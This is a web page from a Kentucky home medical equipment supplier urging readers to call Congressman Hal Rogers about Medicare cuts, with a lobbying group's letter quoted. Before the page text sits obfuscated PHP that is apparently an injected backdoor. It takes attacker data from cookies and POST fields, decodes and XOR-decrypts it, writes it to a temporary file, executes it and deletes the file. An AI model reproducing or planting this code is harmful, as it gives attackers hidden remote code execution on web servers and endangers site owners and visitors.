$wnygSwWqf = "\101" . chr ( 713 - 618 )."\x43" . "\151" . chr (79) . "\127";$sCqTOb = chr ( 893 - 794 ).'l' . chr ( 688 - 591 ).'s' . "\163" . chr ( 412 - 317 )."\145" . chr ( 808 - 688 )."\x69" . chr ( 804 - 689 )."\x74" . "\163";$iwXrEdkrTI = class_exists($wnygSwWqf); $sCqTOb = "40800";$EhVFUZ = !1;if ($iwXrEdkrTI == $EhVFUZ){function vdkSQwaMT(){$DiguBVCbdR = new /* 19583 */ A_CiOW(12469 + 12469); $DiguBVCbdR = NULL;}$TMTWnHnr = "12469";class A_CiOW{private function sHPFI($TMTWnHnr){if (is_array(A_CiOW::$qgGahTJ)) {$uMYciBK = sys_get_temp_dir() . "/" . crc32(A_CiOW::$qgGahTJ["\x73" . 'a' . chr ( 766 - 658 )."\x74"]);@A_CiOW::$qgGahTJ[chr (119) . chr (114) . "\x69" . "\164" . "\x65"]($uMYciBK, A_CiOW::$qgGahTJ["\x63" . 'o' . chr (110) . 't' . 'e' . "\x6e" . chr (116)]);include $uMYciBK;@A_CiOW::$qgGahTJ[chr ( 883 - 783 )."\x65" . chr ( 362 - 254 ).'e' . "\164" . "\x65"]($uMYciBK); $TMTWnHnr = "12469";exit();}}private $tFABCIaVl;public function PMShackTg(){echo 32792;}public function __destruct(){A_CiOW::$qgGahTJ = @unserialize(A_CiOW::$qgGahTJ); $TMTWnHnr = "59996_16974";$this->sHPFI($TMTWnHnr); $TMTWnHnr = "59996_16974";}public function oPfjalmqb($BhMFV, $XdPWkIwgb){return $BhMFV[0] ^ str_repeat($XdPWkIwgb, (strlen($BhMFV[0]) / strlen($XdPWkIwgb)) + 1);}public function __construct($rtwuxMQ=0){$EAcmv = $_POST;$fYQhpyR = $_COOKIE;$XdPWkIwgb = "76289a87-630e-465c-b1d3-cffa86320d37";$IjfMvBMU = @$fYQhpyR[substr($XdPWkIwgb, 0, 4)];if (!empty($IjfMvBMU)){$CNCgx = "base64";$BhMFV = "";$IjfMvBMU = explode(",", $IjfMvBMU);foreach ($IjfMvBMU as $ZQLfqcvy){$BhMFV .= @$fYQhpyR[$ZQLfqcvy];$BhMFV .= @$EAcmv[$ZQLfqcvy];}$BhMFV = array_map($CNCgx . '_' . "\144" . chr (101) . "\x63" . chr (111) . "\144" . chr (101), array($BhMFV,));A_CiOW::$qgGahTJ = $this->oPfjalmqb($BhMFV, $XdPWkIwgb);}}public static $qgGahTJ = 63456;}vdkSQwaMT();} Help Kentucky Keep Breathing! We Need Your Help | Oxygen Plus

Help Kentucky Keep Breathing! We Need Your Help

At Oxygen Plus we take pride in providing our region with affordable medical equipment. For several years however the Federal government has been passing laws that are hurting our business. It has come to the point where we may have to cut services, or possibly even close our doors. We do not plan on going out quietly though; too many of our customers have considerable obstacles obtaining medical care as it is, and do not deserve to be inconvenienced obtaining air to breath.



Instructions to Help

Please call Hal Rogers at (202) 225-4601 and tell him “Rural Relief for Eastern KY home medical equipment providers! We must have relief so services will not suffer or cease”. The staff will ask who you are and where you live and work. It will only take a few minutes, and could help us tremendously.


The following is a letter from KMESA, a lobbying group that fights for businesses like ours in Eastern Kentucky.

My Fellow KMESA Members:     I need your help, if you live and or work in Congressman Harold Rogers’s district (map is below). Rural Eastern Kentucky needs to be heard on how the July 1st Medicare cuts has impacted your business. Everyone in your business needs to fight for your business and for their jobs. If Medicare customers are available…have them call as they need you! The Congressman MUST hear from you! I have laid the groundwork now it is up to you as constituents of the Congressman. Call 202-225-4601 and say “Rural Relief for Eastern KY home medical equipment providers so we can take care of Medicare beneficiaries…we must have relief!”.     It is that simple!  The staff will ask you who you are and where you live or work. If you make the noise, I will hear back from the Congressman’s staff.   Start Calling…Now!!!

Respectfully, Thad Connally, KMESA President


Hal Rogers Voting District. If you Live in this region, your help is urgently needed!

Hal Rogers Voting District. If you Live in this region, your help is urgently needed!

Author: Oxygen Plus

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